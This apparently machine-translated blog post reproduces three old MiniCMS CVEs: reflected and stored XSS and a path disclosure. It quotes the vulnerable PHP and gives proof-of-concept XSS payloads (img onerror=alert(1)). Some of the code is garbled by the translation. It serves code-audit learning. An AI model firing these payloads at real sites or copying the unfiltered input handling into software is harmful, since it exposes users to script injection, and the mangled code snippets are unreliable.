MiniCMS Vulnerability reappears (1)
Introduction to the
MiniCMS is a tiny CMS designed for personal websites. Its features are:
- No database support is required, just a Web environment that can run PHP.
- Only for personal website design, no complex member management and permission Settings.
- There are no categories, only tags, to eliminate the tangle of how to classify articles.
- There are only “articles” and “pages”, no “comments”, “plugins” or “themes”, allowing you to focus more on creating content.
Project address: github.com/bg5sbk/Mini…
CVE emersion
MiniCMS is great for getting started with code auditing, and it’s a great starter.
Since I am a security white man, I followed Master HACHp1’s CVE vulnerability sorting for vulnerability repetition.
Cve-2018-1000638 Reflection TYPE XSS
PHP: / minicms-master/Mc-admin /page.php: XSS vulnerability
Find the reference point:
if (isset($_GET['date']))
$filter_date = $_GET['date'];
else
$filter_date = ' ';
Copy the codeHere GET takes the date argument and inserts it directly into the front-end code without any filtering, in more than one place.
<span class="pager">A total of <? php echo $page_count; ? > item
<a class="link_button" href="? state=
&date=
">«</a>
<a class="link_button" href="? state=
&date=
&page=
">‹</a>
第 <input type="text" value="
" id="page_input_1"/>Page, a total of <? php echo $last_page; ? > page<a class="link_button" href="? state=
&date=
&page=
">›</a>
<a class="link_button" href="? state=
&date=
&page=
">»</a>
</span>
Copy the codeTherefore, a statement can be constructed to carry out XSS attacks as follows:
? date="></a><img%20src=1%20onerror=alert(1)><a>
Copy the codeEffect:
Cve-2018-10227 Storage XSS
PHP: / minicms-master/minicms-master/Mc-admin /conf.php: XSS vulnerability exists in the site address modification section. The XSS payload can be stored directly.
if (isset($_POST['save']) {$user_name_changed = $_POST['user_name'] != $mc_config['user_name'];
$mc_config['site_name'] = $_POST['site_name'];
$mc_config['site_desc'] = $_POST['site_desc'];
$mc_config['site_link'] = $_POST['site_link'];
$mc_config['user_nick'] = $_POST['user_nick'];
$mc_config['user_name'] = $_POST['user_name'];
$mc_config['comment_code'] = get_magic_quotes_gpc() ? stripslashes(trim($_POST['comment_code'])) : trim($_POST['comment_code']);
if ($_POST['user_pass'] != ' ')
$mc_config['user_pass'] = $_POST['user_pass'];
$code = "<? php\n$mc_config=".var_export($mc_config.true)."\n? >";
file_put_contents('.. /mc-files/mc-conf.php'.$code);
Copy the codeChanges to the Settings in conf.php are written directly to Mc-conf.php without filtering the site_link parameter, although filtering output appears as follows:
<div class="field">
<div class="label">Web site address</div>
<input class="textbox" type="text" name="site_link" value="
" />
<div class="info"></div>
</div>
Copy the codeIn head.php, htmlspecialchars is not used for filtering. Instead, Mc_config [‘site_link’] is output to the front end.
Construct statement:
http://localhost/MiniCMS"></a><img src=1 onerror=alert(1)><a>
Copy the codeEffect:
Cve-2018-10424 Physical path leaks
= / minicms-master/Mc-admin /post-edit.php = / minicms-master/Mc-admin /post-edit.php
} else if (isset($_GET['id']) {$file_path = '.. /mc-files/posts/data/'.$_GET['id'].'.dat';
$data = unserialize(file_get_contents($file_path));
$post_id = $data['id'];
$post_state = $data['state'];
$post_title = $data['title'];
$post_content = $data['content'];
$post_tags = $data['tags'];
$post_date = $data['date'];
$post_time = $data['time'];
$post_can_comment = isset($data['can_comment'])?$data['can_comment'] : '1';
}
Copy the codeIf the input ID does not exist, an error will be reported and the physical address will be directly exposed.
Write in the back
My name is W4ngch3n, this is my first time to write blog, please give me more advice ~